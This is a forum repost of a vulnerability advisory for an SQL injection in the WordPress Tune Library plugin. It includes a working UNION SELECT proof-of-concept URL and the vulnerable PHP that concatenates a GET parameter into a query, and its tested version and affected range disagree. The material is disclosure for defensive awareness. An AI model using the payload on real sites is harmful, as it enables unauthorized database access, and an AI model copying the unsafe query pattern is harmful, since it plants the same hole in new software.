|
|
马上注册,结交更多好友,享用更多功能^_^
您需要 登录 才可以下载或查看,没有账号?立即注册
x
# 漏洞名称: WordPress Tune Library plugin <= 2.17 SQL Injection Vulnerability
# 日期: 2011-09-10
# 作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# 软件下载: http://downloads.wordpress.org/plugin/tune-library.zip
# 版本: 1.5.1 (tested)
# 注释: magic_quotes has to be turned off
# Plugin setting “Filter artists by letter and show alphabetical navigation” has to be turned on
poc:
http://www.91***.org/wp-content/p ... -ajax.php?letter=-1 UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20
---------------
Vulnerable code
---------------
$artistletter = $_GET['letter'];
...
if ($options['oneletter'] == false || $showallartists == true)
...
else
{
if ($artistletter == '#')
...
else
{
$querystr ="SELECT distinct artist, 'artist' as source FROM " . $wpdb->prefix . "tracks where artist != '' and artist like '" .$artistletter . "%' order by artist";
}
|
评分
-
查看全部评分
|
( 粤ICP备18085999号-1 | 粤公网安备 44051102000585号)
狗仔卡
发表于 2011-10-14 22:13:13
置顶卡
千斤顶
显身卡